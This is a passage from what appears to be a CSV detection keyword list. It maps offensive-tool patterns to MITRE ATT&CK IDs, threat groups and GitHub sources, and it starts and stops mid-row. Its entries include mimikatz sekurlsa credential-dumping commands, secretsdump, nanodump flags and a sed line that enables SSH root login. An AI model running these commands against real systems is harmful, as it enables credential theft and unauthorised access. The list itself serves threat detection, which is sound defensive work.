T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/apokryptein/secinject,1,1,N/A,10,10,79,20,2022-01-07T21:09:32Z,2021-09-05T01:17:47Z -*secinject/src*,offensive_tool_keyword,cobaltstrike,Section Mapping Process Injection (secinject): Cobalt Strike BOF,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/apokryptein/secinject,1,1,N/A,10,10,79,20,2022-01-07T21:09:32Z,2021-09-05T01:17:47Z -*SecLists*,offensive_tool_keyword,SecLists,SecLists is the security testers companion. Its a collection of multiple types of lists used during security assessments. collected in one place. List types include usernames. passwords. URLs. sensitive data patterns. fuzzing payloads. web shells. 
and many more. The goal is to enable a security tester to pull this repository onto a new testing box and have access to every type of list that may be needed.,T1210.002 - T1212.001 - T1589.001,TA0040 - TA0006 - TA0001,N/A,N/A,Exploitation tools,https://github.com/danielmiessler/SecLists,1,1,N/A,N/A,10,49197,23242,2023-09-23T07:17:59Z,2012-02-19T01:30:18Z -*--seclogon-leak-local*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*--seclogon-leak-remote*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*secrary*,offensive_tool_keyword,Github Username,github username hosting process injection codes ,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/secrary,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*secredump.exe*,offensive_tool_keyword,BackupOperatorToDA,From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller,T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003,TA0005 - TA0001 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/mpgn/BackupOperatorToDA,1,1,N/A,10,4,335,48,2022-10-05T07:29:46Z,2022-02-15T20:51:46Z -*secret_fragment_exploit.py */_fragment*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z 
-*SecretFinder.py*,offensive_tool_keyword,secretfinder,SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files,T1083 - T1081 - T1113,TA0003 - TA0002 - TA0007,N/A,N/A,Credential Access,https://github.com/m4ll0k/SecretFinder,1,1,N/A,N/A,10,1524,324,2023-06-13T00:49:58Z,2020-06-08T10:50:12Z -*SecretFinder-master.zip*,offensive_tool_keyword,secretfinder,SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files,T1083 - T1081 - T1113,TA0003 - TA0002 - TA0007,N/A,N/A,Credential Access,https://github.com/m4ll0k/SecretFinder,1,1,N/A,N/A,10,1524,324,2023-06-13T00:49:58Z,2020-06-08T10:50:12Z -*secrets/secrets_manager/secrets.txt*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,0,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*secrets_dump*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*secrets_dump_dcsync*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*secretsdump *--silent*,offensive_tool_keyword,CSExec,An alternative 
to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,, -*secretsdump -sam *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*secretsdump*,offensive_tool_keyword,POC,Zerologon CVE exploitation (could be other malicious tools too),T1210 - T1068,TA0001,N/A,N/A,Exploitation tools,https://github.com/risksense/zerologon,1,1,N/A,N/A,6,555,144,2020-10-15T18:31:15Z,2020-09-14T19:19:07Z -*secretsdump.*.pyc*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,1,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*secretsdump.py*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,1,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*secretsdump.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*secretsdump.py*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*secretsdump.py*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*secretsdump.py*,offensive_tool_keyword,POC,script used in the POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1548 - T1134 - T1078 - T1078.002,TA0004 ,N/A,N/A,Exploitation tools,https://github.com/Ridter/noPac,1,0,N/A,N/A,7,643,112,2023-01-29T03:31:27Z,2021-12-13T10:28:12Z -*secretsquirrel/the-backdoor-factory*,offensive_tool_keyword,the-backdoor-factory,Patch PE ELF Mach-O binaries with shellcode new version in development*,T1055.002 - T1055.004 - T1059.001,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/secretsquirrel/the-backdoor-factory,1,1,N/A,10,10,3185,809,2023-08-14T02:52:06Z,2013-05-30T01:04:24Z -*sec-shinject *,offensive_tool_keyword,cobaltstrike,Section Mapping Process Injection (secinject): Cobalt Strike BOF,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - 
APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/apokryptein/secinject,1,0,N/A,10,10,79,20,2022-01-07T21:09:32Z,2021-09-05T01:17:47Z -*securesocketfunneling*,offensive_tool_keyword,securesocketfunneling,Secure Socket Funneling (SSF) is a network tool and toolkit It provides simple and efficient ways to forward data from multiple sockets (TCP or UDP) through a single secure TLS link to a remote computer,T1071.001 - T1573 - T1572,TA0003 - TA0009 - ,N/A,N/A,POST Exploitation tools,https://securesocketfunneling.github.io/ssf/#home,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*security-onion*,offensive_tool_keyword,security-onion,Security Onion is a free and open source Linux distribution for threat hunting. enterprise security monitoring. and log management. It includes Elasticsearch. Logstash. Kibana. Snort. Suricata. Bro. Wazuh. Sguil. Squert. NetworkMiner. and many other security tools. 
The easy-to-use Setup wizard allows you to build an army of distributed sensors for your enterprise in minutes,T1059 - T1059.001 - T1059.003 - T1059.004,TA0002 - TA0003 - TA0004 - TA0005,N/A,N/A,Infosec Operation system,https://github.com/Security-Onion-Solutions/security-onion,1,1,N/A,N/A,10,3033,534,2021-04-16T12:14:31Z,2015-03-24T20:15:23Z -*securitywithoutborders*,offensive_tool_keyword,Github Username,pentest documentations,N/A,N/A,N/A,N/A,Information Gathering,https://github.com/securitywithoutborders,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*sed 's/#PermitRootLogin prohibit-password/PermitRootLogin Yes' /etc/ssh/sshd_config*,greyware_tool_keyword,sed,allowing root login for ssh,T1078 - T1078.003 - T1021 - T1021.004,TA0005 - TA0001 - TA0003,N/A,N/A,Defense Evasion,N/A,1,0,N/A,9,10,N/A,N/A,N/A,N/A -*SeeYouCM-Thief.git*,offensive_tool_keyword,SeeYouCM-Thief,Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials,T1110.001 - T1005 - T1071.001,TA0001 - TA0011 - TA0005,N/A,N/A,Discovery,https://github.com/trustedsec/SeeYouCM-Thief,1,1,N/A,9,2,149,30,2023-05-11T01:04:36Z,2022-01-14T20:12:25Z -*SeeYouCM-Thief-main*,offensive_tool_keyword,SeeYouCM-Thief,Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials,T1110.001 - T1005 - T1071.001,TA0001 - TA0011 - TA0005,N/A,N/A,Discovery,https://github.com/trustedsec/SeeYouCM-Thief,1,1,N/A,9,2,149,30,2023-05-11T01:04:36Z,2022-01-14T20:12:25Z -*sekurlsa *,offensive_tool_keyword,mimikatz,mimikatz exploitation command,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Credential 
Access,https://github.com/gentilkiwi/mimikatz,1,0,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*sekurlsa::backupkeys*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*sekurlsa::bootkey*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*sekurlsa::cloudap*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*sekurlsa::credman*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*sekurlsa::dpapi*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*sekurlsa::dpapisystem*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*sekurlsa::ekeys*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. 
This function dumps DPAPI backup keys for users who have logged on to the system,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*sekurlsa::kerberos*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*sekurlsa::krbtgt*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*sekurlsa::livessp*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*sekurlsa::logonpasswords*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. 
This function retrieves plaintext credentials from the LSA secrets in memory.,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*sekurlsa::minidump*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*sekurlsa::msv*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*sekurlsa::process*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*sekurlsa::pth*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. 
hash.This function performs pass-the-hash attacks allowing an attacker to authenticate to a remote system with a stolen hash.,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*sekurlsa::ssp*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 